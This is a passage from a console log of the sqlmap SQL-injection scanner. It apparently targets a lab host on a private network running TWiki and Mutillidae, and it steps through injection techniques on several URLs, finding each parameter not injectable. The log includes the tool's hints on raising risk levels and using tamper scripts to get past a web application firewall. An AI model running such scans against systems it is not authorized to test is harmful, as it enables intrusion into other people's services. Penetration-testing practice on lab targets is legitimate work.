[20:17:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:17:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:17:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:17:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:17:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:17:32] [INFO] testing 'MySQL inline queries' | |
[20:17:32] [INFO] testing 'PostgreSQL inline queries' | |
[20:17:32] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:17:32] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:17:32] [WARNING] time-based comparison requires larger statistical model, please wait.... | |
[20:17:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:17:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:17:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:17:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:17:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:17:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:17:33] [INFO] testing 'Oracle AND time-based blind' | |
[20:17:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' | |
[20:17:33] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:17:33] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found | |
[20:17:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' | |
[20:17:37] [INFO] checking if the injection point on GET parameter 'rev' is a false positive | |
[20:17:38] [WARNING] false positive or unexploitable injection point detected | |
[20:17:38] [WARNING] GET parameter 'rev' is not injectable | |
[20:17:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[20:17:38] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGuest?rev1=1.5&rev2=1.4' | |
[20:17:38] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGuest?rev=1.4' | |
URL 185: | |
GET http://192.168.1.113:80/twiki/bin/oops/Main/TWikiGuest?template=oopsmore¶m1=1.6¶m2=1.6 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:17:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Main/TWikiGuest?template=oopsmore¶m1=1.6¶m2=1.6' | |
[20:17:38] [INFO] testing connection to the target URL | |
[20:17:38] [INFO] testing if the target URL is stable | |
[20:17:39] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[20:17:39] [INFO] testing if GET parameter 'template' is dynamic | |
[20:17:39] [INFO] confirming that GET parameter 'template' is dynamic | |
[20:17:39] [INFO] GET parameter 'template' is dynamic | |
[20:17:39] [INFO] heuristics detected web page charset 'ascii' | |
[20:17:39] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[20:17:39] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[20:17:39] [INFO] testing for SQL injection on GET parameter 'template' | |
[20:17:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:17:39] [WARNING] reflective value(s) found and filtering out | |
[20:17:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:17:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:17:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:17:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:17:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:17:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:17:42] [INFO] testing 'MySQL inline queries' | |
[20:17:42] [INFO] testing 'PostgreSQL inline queries' | |
[20:17:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:17:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:17:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:17:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:17:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:17:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:17:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:17:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:17:45] [INFO] testing 'Oracle AND time-based blind' | |
[20:17:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:17:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:17:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:17:54] [WARNING] GET parameter 'template' is not injectable | |
[20:17:54] [INFO] testing if GET parameter 'param1' is dynamic | |
[20:17:54] [WARNING] GET parameter 'param1' does not appear dynamic | |
[20:17:54] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[20:17:55] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[20:17:55] [INFO] testing for SQL injection on GET parameter 'param1' | |
[20:17:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:17:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:17:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:17:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:17:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:17:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:17:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:17:58] [INFO] testing 'MySQL inline queries' | |
[20:17:58] [INFO] testing 'PostgreSQL inline queries' | |
[20:17:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:17:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:17:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:17:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:18:00] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:18:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:18:01] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:18:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:18:02] [INFO] testing 'Oracle AND time-based blind' | |
[20:18:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:18:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:18:15] [WARNING] GET parameter 'param1' is not injectable | |
[20:18:15] [INFO] testing if GET parameter 'param2' is dynamic | |
[20:18:15] [WARNING] GET parameter 'param2' does not appear dynamic | |
[20:18:15] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[20:18:15] [INFO] testing for SQL injection on GET parameter 'param2' | |
[20:18:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:18:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:18:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:18:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:18:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:18:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:18:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:18:19] [INFO] testing 'MySQL inline queries' | |
[20:18:19] [INFO] testing 'PostgreSQL inline queries' | |
[20:18:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:18:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:18:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:18:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:18:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:18:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:18:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:18:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:18:22] [INFO] testing 'Oracle AND time-based blind' | |
[20:18:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:18:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:18:35] [WARNING] GET parameter 'param2' is not injectable | |
[20:18:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[20:18:35] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=documentation/vulnerabilities.php' | |
URL 186: | |
GET http://192.168.1.113:80/twiki/bin/edit/Main/EngineeringGroup?topicparent=Main.TWikiGroups | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:18:35] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/EngineeringGroup?topicparent=Main.TWikiGroups' | |
[20:18:35] [INFO] testing connection to the target URL | |
[20:18:35] [INFO] testing if the target URL is stable | |
[20:18:36] [INFO] target URL is stable | |
[20:18:36] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[20:18:36] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[20:18:36] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[20:18:36] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[20:18:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:18:36] [WARNING] reflective value(s) found and filtering out | |
[20:18:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:18:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:18:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:18:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:18:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:18:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:18:40] [INFO] testing 'MySQL inline queries' | |
[20:18:40] [INFO] testing 'PostgreSQL inline queries' | |
[20:18:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:18:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:18:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:18:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:18:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:18:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:18:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:18:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:18:43] [INFO] testing 'Oracle AND time-based blind' | |
[20:18:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:18:43] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:18:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:18:55] [WARNING] GET parameter 'topicparent' is not injectable | |
[20:18:55] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 187: | |
GET http://192.168.1.113:80/twiki/bin/edit/Main/SupportGroup?topicparent=Main.TWikiGroups | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:18:55] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/SupportGroup?topicparent=Main.TWikiGroups' | |
[20:18:55] [INFO] testing connection to the target URL | |
[20:18:55] [INFO] testing if the target URL is stable | |
[20:18:56] [INFO] target URL is stable | |
[20:18:56] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[20:18:56] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[20:18:56] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[20:18:56] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[20:18:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:18:56] [WARNING] reflective value(s) found and filtering out | |
[20:18:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:18:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:18:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:18:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:18:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:18:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:18:59] [INFO] testing 'MySQL inline queries' | |
[20:18:59] [INFO] testing 'PostgreSQL inline queries' | |
[20:19:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:19:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:19:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:19:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:19:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:19:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:19:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:19:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:19:03] [INFO] testing 'Oracle AND time-based blind' | |
[20:19:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:19:03] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:19:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:19:14] [WARNING] GET parameter 'topicparent' is not injectable | |
[20:19:14] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 188: | |
GET http://192.168.1.113:80/twiki/bin/edit/Main/TWikiGroups?t=1441457837 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:19:14] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/TWikiGroups?t=1441457837' | |
[20:19:14] [INFO] testing connection to the target URL | |
[20:19:15] [INFO] testing if the target URL is stable | |
[20:19:15] [INFO] target URL is stable | |
[20:19:15] [INFO] testing if GET parameter 't' is dynamic | |
[20:19:16] [WARNING] GET parameter 't' does not appear dynamic | |
[20:19:16] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[20:19:16] [INFO] testing for SQL injection on GET parameter 't' | |
[20:19:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:19:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:19:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:19:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:19:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:19:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:19:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:19:19] [INFO] testing 'MySQL inline queries' | |
[20:19:19] [INFO] testing 'PostgreSQL inline queries' | |
[20:19:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:19:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:19:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:19:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:19:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:19:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:19:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:19:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:19:22] [INFO] testing 'Oracle AND time-based blind' | |
[20:19:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:19:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:19:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:19:34] [WARNING] GET parameter 't' is not injectable | |
[20:19:34] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 189: | |
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=TWiki *Groups[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:19:34] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=TWiki *Groups[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[20:19:34] [INFO] testing connection to the target URL | |
[20:19:34] [INFO] testing if the target URL is stable | |
[20:19:35] [INFO] target URL is stable | |
[20:19:35] [INFO] testing if URI parameter '#1*' is dynamic | |
[20:19:35] [WARNING] URI parameter '#1*' does not appear dynamic | |
[20:19:36] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[20:19:36] [INFO] testing for SQL injection on URI parameter '#1*' | |
[20:19:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:19:36] [WARNING] reflective value(s) found and filtering out | |
[20:19:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:19:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:19:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:19:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:19:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:19:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:19:39] [INFO] testing 'MySQL inline queries' | |
[20:19:39] [INFO] testing 'PostgreSQL inline queries' | |
[20:19:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:19:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:19:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:19:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:19:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:19:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:19:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:19:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:19:43] [INFO] testing 'Oracle AND time-based blind' | |
[20:19:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:19:43] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:19:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:19:55] [WARNING] URI parameter '#1*' is not injectable | |
[20:19:55] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 190: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/TWikiGroups?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:19:55] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGroups?skin=print' | |
[20:19:55] [INFO] testing connection to the target URL | |
[20:19:55] [INFO] testing if the target URL is stable | |
[20:19:56] [INFO] target URL is stable | |
[20:19:56] [INFO] testing if GET parameter 'skin' is dynamic | |
[20:19:56] [INFO] confirming that GET parameter 'skin' is dynamic | |
[20:19:56] [INFO] GET parameter 'skin' is dynamic | |
[20:19:56] [INFO] heuristics detected web page charset 'ascii' | |
[20:19:56] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[20:19:56] [INFO] testing for SQL injection on GET parameter 'skin' | |
[20:19:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:19:56] [WARNING] reflective value(s) found and filtering out | |
[20:19:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:19:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:19:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:19:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:19:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:19:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:20:00] [INFO] testing 'MySQL inline queries' | |
[20:20:00] [INFO] testing 'PostgreSQL inline queries' | |
[20:20:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:20:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:20:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:20:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:20:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:20:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:20:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:20:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:20:03] [INFO] testing 'Oracle AND time-based blind' | |
[20:20:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:20:03] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:20:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:20:14] [WARNING] GET parameter 'skin' is not injectable | |
[20:20:14] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 191: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGroups?rev1=1.4&rev2=1.3 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:20:14] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGroups?rev1=1.4&rev2=1.3' | |
[20:20:14] [INFO] testing connection to the target URL | |
[20:20:14] [INFO] testing if the target URL is stable | |
[20:20:15] [INFO] target URL is stable | |
[20:20:15] [INFO] testing if GET parameter 'rev1' is dynamic | |
[20:20:15] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[20:20:15] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[20:20:15] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[20:20:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:20:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:20:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:20:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:20:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:20:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:20:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:20:19] [INFO] testing 'MySQL inline queries' | |
[20:20:19] [INFO] testing 'PostgreSQL inline queries' | |
[20:20:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:20:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:20:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:20:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:20:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:20:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:20:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:20:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:20:22] [INFO] testing 'Oracle AND time-based blind' | |
[20:20:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:20:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:20:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:20:34] [WARNING] GET parameter 'rev1' is not injectable | |
[20:20:34] [INFO] testing if GET parameter 'rev2' is dynamic | |
[20:20:34] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[20:20:35] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[20:20:35] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[20:20:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:20:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:20:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:20:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:20:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:20:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:20:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:20:38] [INFO] testing 'MySQL inline queries' | |
[20:20:38] [INFO] testing 'PostgreSQL inline queries' | |
[20:20:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:20:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:20:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:20:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:20:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
